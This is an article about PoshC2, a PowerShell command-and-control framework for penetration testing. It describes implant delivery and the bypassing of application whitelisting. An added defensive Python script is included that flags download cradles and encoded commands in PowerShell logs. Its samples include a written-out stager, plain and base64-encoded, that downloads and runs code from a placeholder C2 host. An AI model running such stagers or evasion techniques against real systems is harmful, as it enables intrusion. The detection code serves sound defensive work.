How to use PowerShell for command and control and bypass security checks

Windows' share of the global operating system market is obvious to everyone, modern Windows platforms ship with PowerShell installed by default, and system administrators can use the PowerShell console without restriction. For these reasons, many current penetration testing tools are written in PowerShell. Note, however, that the same properties also make PowerShell a favourite tool of cyber criminals.

Ben Turner and Dave Hardy, two security researchers at Nettitude, developed PoshC2, a PowerShell and C# command and control tool that implements a variety of attack techniques and is also very easy to use. The most important feature of PoshC2 is that it can bypass the various security controls deployed on the target host.

Download PoshC2 from the GitHub repository (reference 4).

Usage

Install PoshC2

PoshC2 encrypts the traffic between the implant and the C2 server, and the server can be fully configured in eight simple steps.

Once configuration is complete, the tool lists all the launch techniques it supports. The penetration tester can use PoshC2 to bypass AppLocker or Bit9 application whitelisting, or download the implant to the target host with a PowerShell one-liner.
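The other side of the whitelisting claim deserves a worked example. AppLocker and Bit9 decide whether a host binary may run, but when the stager is a PowerShell one-liner, PowerShell 5 script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) records the script text that actually executed, including whatever is hidden behind -EncodedCommand. The Python triage script below is an added example written for this page, not PoshC2's own code; the log records it scans are constructed, the C2 hostname c2.example.test is a placeholder, and the indicator list is a starting point rather than a complete rule set.

```python
"""
Added example, not PoshC2's own code: triage PowerShell script-block log
records (Event ID 4104 style) for the patterns a PowerShell-delivered
implant stager relies on. Application whitelisting judges the host binary;
script block logging records the script text, so a download cradle, an
-EncodedCommand wrapper or an in-memory assembly load is still visible.
All log records below are constructed for this example.
"""
import base64
import re
from dataclasses import dataclass, field


@dataclass
class Finding:
    record_id: str
    tags: list = field(default_factory=list)
    decoded: str = ""  # text recovered from a -EncodedCommand argument, if any


# (tag, pattern). Case-insensitive because PowerShell is.
INDICATORS = [
    ("download_cradle", re.compile(
        r"Net\.WebClient|Download(String|Data|File)|Invoke-WebRequest|\biwr\b"
        r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.I)),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("base64_inline", re.compile(r"FromBase64String", re.I)),
    ("reflective_load", re.compile(
        r"\[(System\.)?Reflection\.Assembly\]::Load", re.I)),
    ("stealth_switches", re.compile(
        r"-(w(indowstyle)?\s+hidden|nop(rofile)?\b|noni(nteractive)?\b"
        r"|ep\s+bypass|executionpolicy\s+bypass)", re.I)),
]

# -EncodedCommand and its short forms take base64 of UTF-16LE script text.
ENCODED_CMD = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str:
    """Return the script hidden behind -EncodedCommand, or "" if absent/invalid."""
    m = ENCODED_CMD.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(record_id: str, script_text: str) -> Finding:
    """Tag one script-block record; the decoded layer is scanned as well."""
    finding = Finding(record_id)
    decoded = decode_encoded_command(script_text)
    if decoded:
        finding.tags.append("encoded_command")
        finding.decoded = decoded
    for tag, pattern in INDICATORS:
        if pattern.search(script_text) or (decoded and pattern.search(decoded)):
            finding.tags.append(tag)
    return finding


def triage(records: dict) -> dict:
    """Return {record_id: Finding} for every record that hits an indicator."""
    hits = {}
    for record_id, text in records.items():
        finding = analyse(record_id, text)
        if finding.tags:
            hits[record_id] = finding
    return hits


# Constructed sample script blocks. c2.example.test is a placeholder host.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.test/stage')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_SCRIPT_BLOCKS = {
    "rec-1": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",  # benign admin activity
    "rec-2": STAGER,  # classic download cradle in the clear
    "rec-3": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_STAGER}",  # same cradle, encoded
    "rec-4": "[Reflection.Assembly]::Load([Convert]::FromBase64String($blob))",  # in-memory load
}

if __name__ == "__main__":
    for record_id, finding in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(record_id, sorted(finding.tags))
        if finding.decoded:
            print("   decoded:", finding.decoded)
```

The point of decoding the -EncodedCommand layer before matching is that the cradle in rec-3 never appears in the clear on the command line; only the script-block record, or this decode step over a process-creation log, exposes it. Run it on exported 4104 records by replacing the constructed dictionary with the ScriptBlockText field of each event.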

PoshC2 can also generate a variety of powerful payloads that researchers can use during a penetration test or security assessment.

Once the implant has been downloaded and run on the target host, the Implant Handler console opens. It manages the interaction between the implant and the C2 server and executes commands on the target host.

Much like a PowerShell session, it accepts any PowerShell command as well as PoshC2's own commands; the latter are listed in the help menu.

PoshC2's implant also includes a number of other techniques that researchers can use to extract information, escalate privileges, or collect host and domain information.

Note: the tool also provides a graphical user interface, which requires the .NET Framework (v4.03019). In addition, the tool's output can be saved as an HTML file.

PoshC2's biggest advantage is that it is built on PowerShell, so its implant needs no additional dependencies, unlike many other command and control tools that are written in Python. It is also fast and efficient, very stable, and its output is very detailed.

In short, PoshC2 can be a great help to most penetration testers.

References:

  1. https://labs.nettitude.com/blog/poshc2-new-features/
  2. https://labs.nettitude.com/blog/release-of-nettitudes-poshc2/
  3. https://labs.nettitude.com/tools/poshc2/
  4. https://github.com/nettitude/PoshC2
  5. https://pentestlab.blog/2017/08/19/command-and-control-powershell/